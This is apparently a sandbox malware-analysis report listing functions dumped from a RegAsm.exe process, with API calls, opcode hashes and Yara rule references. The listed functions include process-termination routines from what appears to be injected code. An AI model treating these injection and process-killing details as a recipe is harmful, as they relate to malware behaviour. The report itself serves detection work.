API ID: _invalid_parameter_noinfo_noreturnfreememcpymemset
String ID:
API String ID: 3725304770-0
Opcode ID: 8e77cba045a896bfc7558883784b30e955e5718c8f8835e6faf8caf39bc4de93
Instruction ID: d88970dc60dac1d90ab3021ca3e37de35b636637af6f37045660b78772572157
Opcode Fuzzy Hash: 8e77cba045a896bfc7558883784b30e955e5718c8f8835e6faf8caf39bc4de93
Instruction Fuzzy Hash: CF81C170A113099FDB08CF68D8949AEBBB5FF89358F04452CEC11AB754D730E995CBA2

Function 6C2C5C50 Relevance: 6.1, APIs: 4, Instructions: 145COMMON

Download Yara Rule

APIs

GetTickCount64.KERNEL32 ref: 6C2C5D40
EnterCriticalSection.KERNEL32(6C32F688), ref: 6C2C5D67
__aulldiv.LIBCMT ref: 6C2C5DB4
LeaveCriticalSection.KERNEL32(6C32F688), ref: 6C2C5DED

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: CriticalSection$Count64EnterLeaveTick__aulldiv
String ID:
API String ID: 557828605-0
Opcode ID: 7ebf0a233b89dc5893a887032919692eb1724fc71f8f84f320f1459f7ba13283
Instruction ID: ce45c02c71e0e0b5ee79f36c560a6d655925b01d706a02e796888f4f0b542cb9
Opcode Fuzzy Hash: 7ebf0a233b89dc5893a887032919692eb1724fc71f8f84f320f1459f7ba13283
Instruction Fuzzy Hash: E6517075F0022A8FCF08CFA8C855AAEBBB6FB89304F19472DD811A7750C735A945CB91

Function 6C307170 Relevance: 6.1, APIs: 4, Instructions: 138COMMON

Download Yara Rule

APIs

GetTickCount64.KERNEL32 ref: 6C307250
EnterCriticalSection.KERNEL32(6C32F688), ref: 6C307277
__aulldiv.LIBCMT ref: 6C3072C4
LeaveCriticalSection.KERNEL32(6C32F688), ref: 6C3072F7

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: CriticalSection$Count64EnterLeaveTick__aulldiv
String ID:
API String ID: 557828605-0
Opcode ID: 2d2e2f4127ba2179e067480700bfbc2a2620a9b6c51aa3f18c082cd65c7f60b6
Instruction ID: dbc76479ad8a25d8e9d7c27b9853cc4f760c75becd0ce633ad332de56880deaa
Opcode Fuzzy Hash: 2d2e2f4127ba2179e067480700bfbc2a2620a9b6c51aa3f18c082cd65c7f60b6
Instruction Fuzzy Hash: AB513C72F001298FDF08CFA8C951AAEB7B9FB8A304F15862DD855A7750C7356945CB90

Function 6C2ACDF0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 128COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,-000000EA,?,?,?,?,?,?,?,?,?,?,?), ref: 6C2ACEBD
memcpy.VCRUNTIME140(?,?,?,?,?,?,?), ref: 6C2ACEF5
memset.VCRUNTIME140(-000000E5,00000030,?,?,?,?,?,?,?,?), ref: 6C2ACF4E

Strings

0, xrefs: 6C2ACF30

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: memcpy$memset
String ID: 0
API String ID: 438689982-4108050209
Opcode ID: fc8f5cf4d6d23833dead3e12e1c69575286e77a121e958d42b6170495ba87eb6
Instruction ID: 25f57eedc40b12f31e56ff7ce2d9b569179aab6f37d8b1c8a34441853840876f
Opcode Fuzzy Hash: fc8f5cf4d6d23833dead3e12e1c69575286e77a121e958d42b6170495ba87eb6
Instruction Fuzzy Hash: EA511071A0425A8FCB04CF18C890AAAFBA5EF99300F19859DDC595F752D732ED06CBE0

Function 6C3077D0 Relevance: 6.1, APIs: 4, Instructions: 113stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C3077FA
?StringToDouble@StringToDoubleConverter@double_conversion@@QBENPBDHPAH@Z.MOZGLUE(00000001,00000000,?), ref: 6C307829

Part of subcall function 6C2DCC38: GetCurrentProcess.KERNEL32(?,?,?,?,6C2A31A7), ref: 6C2DCC45
Part of subcall function 6C2DCC38: TerminateProcess.KERNEL32(00000000,00000003,?,?,?,?,6C2A31A7), ref: 6C2DCC4E

?EcmaScriptConverter@DoubleToStringConverter@double_conversion@@SAABV12@XZ.MOZGLUE ref: 6C30789F
?ToShortestIeeeNumber@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@W4DtoaMode@12@@Z.MOZGLUE ref: 6C3078CF

Part of subcall function 6C2A4DE0: ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C2A4E5A
Part of subcall function 6C2A4DE0: ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C2A4E97

Part of subcall function 6C2A4290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C2E3EBD,6C2E3EBD,00000000), ref: 6C2A42A9

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: String$Double$Converter@double_conversion@@$DtoaProcessstrlen$Ascii@Builder@2@Builder@2@@Converter@CreateCurrentDecimalDouble@EcmaIeeeMode@12@Mode@12@@Number@Representation@ScriptShortestTerminateV12@
String ID:
API String ID: 2525797420-0
Opcode ID: 99abf7409c8616f57d32cca0af4a95c97021d300e79c906844d5a1f04465e34a
Instruction ID: cd085178a69805d1b0dd4f89b09afd4bd4f02e79bf11a7d9bb8ed843f28b4bc3
Opcode Fuzzy Hash: 99abf7409c8616f57d32cca0af4a95c97021d300e79c906844d5a1f04465e34a
Instruction Fuzzy Hash: 8341AF71A047469FD700DF29C48056BFBF4FF8A354F204A2EE8A987640DB71E55ACB92

Function 6C2FDAE0 Relevance: 6.1, APIs: 4, Instructions: 113COMMON

Download Yara Rule

APIs

??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C2FDB86
??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C2FDC0E
free.MOZGLUE(?), ref: 6C2FDC2E
free.MOZGLUE(?), ref: 6C2FDC40

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: Impl@detail@mozilla@@Mutexfree
String ID:
API String ID: 3186548839-0
Opcode ID: 0454e7404492688dcf1800eaf5935ebe264321e4f474488fdca5fda396102b45
Instruction ID: 8a5b3613bb4040ff1f0609df7876618a106ba5638a1730fcae23cec7c08dca18
Opcode Fuzzy Hash: 0454e7404492688dcf1800eaf5935ebe264321e4f474488fdca5fda396102b45
Instruction Fuzzy Hash: FF4167B56007098FC710CF34C498B9ABBF6BF88254F55892DE8AA87741EB35E845CB51

Function 6C2E6470 Relevance: 6.1, APIs: 4, Instructions: 93COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000200,?,?,?,?,?,?,?,?,?,?,?,?,6C2E82BC,?,?), ref: 6C2E649B

Part of subcall function 6C2BCA10: malloc.MOZGLUE(?), ref: 6C2BCA26

memset.VCRUNTIME140(00000000,00000000,00000200,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C2E64A9

Part of subcall function 6C2DFA80: GetCurrentThreadId.KERNEL32 ref: 6C2DFA8D
Part of subcall function 6C2DFA80: AcquireSRWLockExclusive.KERNEL32(6C32F448), ref: 6C2DFA99

ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C2E653F
free.MOZGLUE(?), ref: 6C2E655A

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadfreemallocmemsetmoz_xmalloc
String ID:
API String ID: 3596744550-0
Opcode ID: 3ed0d42712825f3de6924441ec14cef8c7fcefbdee40a49e8f5c04ba22567ebe
Instruction ID: cd0fb5c50010586f33c466ca2af31d81f85ab809e9088b8c0f19081c19fba9d6
Opcode Fuzzy Hash: 3ed0d42712825f3de6924441ec14cef8c7fcefbdee40a49e8f5c04ba22567ebe
Instruction Fuzzy Hash: AE3181B5A043499FCB00CF14D880A9ABBE4BF89314F41442DEC5A97741D734E909CB92

Function 6C2FA2B0 Relevance: 6.1, APIs: 4, Instructions: 90COMMON

Download Yara Rule

APIs

free.MOZGLUE(?), ref: 6C2FA315
?_Xbad_function_call@std@@YAXXZ.MSVCP140(?), ref: 6C2FA31F
free.MOZGLUE(00000000,?,?,?,?), ref: 6C2FA36A

Part of subcall function 6C2C5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C2C5EDB
Part of subcall function 6C2C5E90: memset.VCRUNTIME140(ew0l,000000E5,?), ref: 6C2C5F27
Part of subcall function 6C2C5E90: LeaveCriticalSection.KERNEL32(?), ref: 6C2C5FB2

Part of subcall function 6C2F2140: free.MOZGLUE(?,00000060,?,6C2F7D36,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C2F215D

free.MOZGLUE(00000000), ref: 6C2FA37C

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: free$CriticalSection$EnterLeaveXbad_function_call@std@@memset
String ID:
API String ID: 700533648-0
Opcode ID: dfb95de350375a25fe5132e6cec70d2e37cf1b9121cc3259c1085596f884c29a
Instruction ID: 1d8a06a3a97bef8439e003107d0456eb060b094a3ed656cf1a2d0be384534190
Opcode Fuzzy Hash: dfb95de350375a25fe5132e6cec70d2e37cf1b9121cc3259c1085596f884c29a
Instruction Fuzzy Hash: E121D371A4022C9BCB018B0AD400B9FF7A8EF86718F058025ED195B701D772ED07C7D2

Function 004194D0 Relevance: 6.1, APIs: 4, Instructions: 89COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004194EB

Part of subcall function 00418D50: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0041951E,00000000), ref: 00418D5B
Part of subcall function 00418D50: HeapAlloc.KERNEL32(00000000,?,?,0041951E,00000000), ref: 00418D62
Part of subcall function 00418D50: wsprintfW.USER32 ref: 00418D78

OpenProcess.KERNEL32(00001001,00000000,?), ref: 004195AB
TerminateProcess.KERNEL32(00000000,00000000), ref: 004195C9
CloseHandle.KERNEL32(00000000), ref: 004195D6

Memory Dump Source

Source File: 00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000485000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000488000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004E2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004EF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000050F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000064A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000065C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Process$Heap$AllocCloseHandleOpenTerminatememsetwsprintf
String ID:
API String ID: 396451647-0
Opcode ID: e1e5d2abd36f792ce8e7696cd4d1ddef66465fbe477d7900cfae79242c714ba2
Instruction ID: faa3cbc47edc6d62fcde4c42a86d6f60d7c6cb9d9231cedff5acf80003c00c5b
Opcode Fuzzy Hash: e1e5d2abd36f792ce8e7696cd4d1ddef66465fbe477d7900cfae79242c714ba2
Instruction Fuzzy Hash: E3315C75E4020CAFDB14DFD0CD49BEDB7B9EB44300F10441AE506AA284DB78AE89CB56

Function 6C2DFF60 Relevance: 6.1, APIs: 4, Instructions: 83COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,80000001,80000000,?,6C2FD019,?,?,?,?,?,00000000,?,6C2EDA31,00100000,?), ref: 6C2DFFD3
memcpy.VCRUNTIME140(00000000,?,?,?,6C2FD019,?,?,?,?,?,00000000,?,6C2EDA31,00100000,?,?), ref: 6C2DFFF5
free.MOZGLUE(?,?,?,?,?,6C2FD019,?,?,?,?,?,00000000,?,6C2EDA31,00100000,?), ref: 6C2E001B
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,6C2FD019,?,?,?,?,?,00000000,?,6C2EDA31,00100000,?,?), ref: 6C2E002A

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: memcpy$_invalid_parameter_noinfo_noreturnfree
String ID:
API String ID: 826125452-0
Opcode ID: 9eb03eadcd1cec986b5f42adc0581f3446669e75793e8aab509f367f2adda5ac
Instruction ID: b7e0a4674fbb46dfb23a6fb3f1f459ad603df949f5a9ec9cadac9547579599ee
Opcode Fuzzy Hash: 9eb03eadcd1cec986b5f42adc0581f3446669e75793e8aab509f367f2adda5ac
Instruction Fuzzy Hash: 0421DB72E002155FC7189E78DC944AFB7B9FB893247250738E825D77C0EA70AD0186D5

Function 6C307B10 Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 6C307B51
__aulldiv.LIBCMT ref: 6C307B6C
__aulldiv.LIBCMT ref: 6C307B8B
__aulldiv.LIBCMT ref: 6C307BB1

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: __aulldiv
String ID:
API String ID: 3732870572-0
Opcode ID: d00a51c4c5f930f9caa17efa13413b4b30e460f116377f5c22957434e894d04c
Instruction ID: fe59029b20f3d470fa574138c95f0b390d61fba4d44186583764a46aee9b07a8
Opcode Fuzzy Hash: d00a51c4c5f930f9caa17efa13413b4b30e460f116377f5c22957434e894d04c
Instruction Fuzzy Hash: 08215EB1B0060A6FD714DF6DCC81EA7BBF8EB85714B11853DE41ADB740E674E8048BA0

Function 6C30AAE0 Relevance: 6.1, APIs: 4, Instructions: 59threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C30AAF8
EnterCriticalSection.KERNEL32(6C32F770,?,6C2CBF9F), ref: 6C30AB08
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,6C2CBF9F), ref: 6C30AB39
LeaveCriticalSection.KERNEL32(6C32F770,?,?,?,?,?,?,?,?,6C2CBF9F), ref: 6C30AB6B

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: CriticalSection$CurrentEnterLeaveThread_stricmp
String ID:
API String ID: 1951318356-0
Opcode ID: 8276495c954d9db3234d7d7229cb4421bccb95f7a30dd12aa6cbbff3d3bc1d7f
Instruction ID: 627b851fdca47974b1eb89f845c0b1b084b9f2359c1a2e4e56a742f3fd74d3e5
Opcode Fuzzy Hash: 8276495c954d9db3234d7d7229cb4421bccb95f7a30dd12aa6cbbff3d3bc1d7f
Instruction Fuzzy Hash: 481130B2B002198FCF00DFA9E88499BBBB9FF493497044429E54597301E738E909CBB1

Function 6C2BB4E0 Relevance: 6.1, APIs: 4, Instructions: 54threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C2BB4F5
AcquireSRWLockExclusive.KERNEL32(6C32F4B8), ref: 6C2BB502
ReleaseSRWLockExclusive.KERNEL32(6C32F4B8), ref: 6C2BB542
free.MOZGLUE(?), ref: 6C2BB578

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
String ID:
API String ID: 2047719359-0
Opcode ID: 524f910e7eac82165f176e6197e137468ef40136f9967dd188f22be30c731c18
Instruction ID: d124bb839e186ff628c215f3c7f953396a2feb40560d99c0388d19aede0183b7
Opcode Fuzzy Hash: 524f910e7eac82165f176e6197e137468ef40136f9967dd188f22be30c731c18
Instruction Fuzzy Hash: 9311D230A14B49C7DB118F29C9407A1B3B4FF9A35DF14971EEC4A67A01EBB9B1C48791

Function 00417980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E00,00000000,?), ref: 004179B0
HeapAlloc.KERNEL32(00000000,?,?,?,?,00420E00,00000000,?), ref: 004179B7
GetLocalTime.KERNEL32(?,?,?,?,?,00420E00,00000000,?), ref: 004179C4
wsprintfA.USER32 ref: 004179F3

Memory Dump Source

Source File: 00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000485000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000488000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004E2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004EF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000050F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000064A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000065C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocLocalProcessTimewsprintf
String ID:
API String ID: 1243822799-0
Opcode ID: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
Instruction ID: 87643aaeb61937c0b28f46190d625ee9f9fa63f6271d25fb840393839df263de
Opcode Fuzzy Hash: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
Instruction Fuzzy Hash: 6D1139B2944118ABCB14DFC9DD45BBEB7F9FB4DB11F10421AF605A2280E3395940CBB5

Function 6C2E3DE0 Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,6C2AF20E,?), ref: 6C2E3DF5
fputs.API-MS-WIN-CRT-STDIO-L1-1-0(6C2AF20E,00000000,?), ref: 6C2E3DFC
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C2E3E06
fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,00000000), ref: 6C2E3E0E

Part of subcall function 6C2DCC00: GetCurrentProcess.KERNEL32(?,?,6C2A31A7), ref: 6C2DCC0D
Part of subcall function 6C2DCC00: TerminateProcess.KERNEL32(00000000,00000003,?,?,6C2A31A7), ref: 6C2DCC16

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: Process__acrt_iob_func$CurrentTerminatefputcfputs
String ID:
API String ID: 2787204188-0
Opcode ID: 55a2f238b5d50c9e22ab76e9b8dcf491bfacde43fc35ad8c2ef0a7d35ec64279
Instruction ID: 714fc053879ba3c69df83e196f1f7b5709525580f37034384805185bba5fc33a
Opcode Fuzzy Hash: 55a2f238b5d50c9e22ab76e9b8dcf491bfacde43fc35ad8c2ef0a7d35ec64279
Instruction Fuzzy Hash: 5FF012715002087FDB04AB54EC41DAB376DEF46628F054024FE0957741D639FD1596F7

Function 6C2F2050 Relevance: 6.0, APIs: 4, Instructions: 33threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C2F205B
AcquireSRWLockExclusive.KERNEL32(?,?,?,00000000,?,6C2F201B,?,?,?,?,?,?,?,6C2F1F8F,?,?), ref: 6C2F2064
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C2F208E
free.MOZGLUE(?,?,?,00000000,?,6C2F201B,?,?,?,?,?,?,?,6C2F1F8F,?,?), ref: 6C2F20A3

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
String ID:
API String ID: 2047719359-0
